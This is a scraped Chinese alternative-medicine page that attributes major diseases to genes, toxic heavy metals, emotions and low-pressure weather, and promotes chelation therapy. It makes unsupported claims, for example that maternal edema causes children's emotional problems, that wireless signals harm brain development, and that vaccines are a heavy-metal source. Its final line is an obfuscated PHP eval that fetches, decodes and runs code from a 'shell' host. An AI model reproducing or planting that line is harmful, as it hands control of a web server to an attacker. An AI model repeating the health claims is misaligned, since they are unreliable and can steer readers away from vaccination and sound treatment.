收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 人體重大疾病成因
人體重大疾病成因 列印 E-mail
人體重大疾病的產生必然有以下幾個原因:

一、基因遺傳,因為基因是決定器官疾病種類的最大原因,遺傳正如同一個砲彈殼放在被基因影響的器官。

二、有毒重金屬的傷害,有毒重金屬累積量越大,正如同砲彈殼中的火藥量越多。

三、情緒與不正常的低氣壓,就是砲彈的引信,也就是自己和外界會單獨或共同造成砲彈引信的誘發。

如果某個人身體的某部份比較虛弱,情緒、天氣和季節對人體就有很大的影響,所以情緒管理是非常重要的;而寒流來襲和某些不正常的天氣如:三月雪、十月颱等這些不正常的低氣壓時,要特別預防中風、心肌梗塞、胃出血等疾病。颱風跟寒流一樣,都屬於「低氣壓」的一種,每當這些時節,救護車穿梭奔馳的聲音就特別多,請各位此時要多加小心!

        基因的改變,只有等待DNA醫學的進步,但情緒的問題,卻是我們可以掌控的。現今台灣人情緒極為不穩定,尤其孩童的情緒管理更差,過動兒普遍的存在於兒童不同的年齡階層。中醫理論:「心主神」情緒屬於神志,情緒不穩定表示神志為「躁」,為「心的實症」,在中醫理論多為「心腎不交」,因孕婦水腫,表示腎虛,容易造成「心的實症」,諸如心悸、胸悶、失眠多夢、煩躁不安;此為胎兒心腎不交的主因,胎兒出生後,因而情緒不穩定。多年來,因為產婦嚴重水腫的普遍性,情緒管理不佳普遍存在於各年齡層;無線通訊的進步及電力的普及使用,造成人類生活在高頻的環境中,嚴重影響腦部的發育與生長,也讓現代人情緒管理產生嚴重的問題。

        科技的進步造成有毒重金屬的存在且氾濫於我們的生活空間,如石油、農藥、電池、香煙、預防注射等等,這是一個在主流醫學中既嚴重又難改善的課題,卻是另類醫學中最容易處理的項目──「螯合療法」就是目前最佳的選擇。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));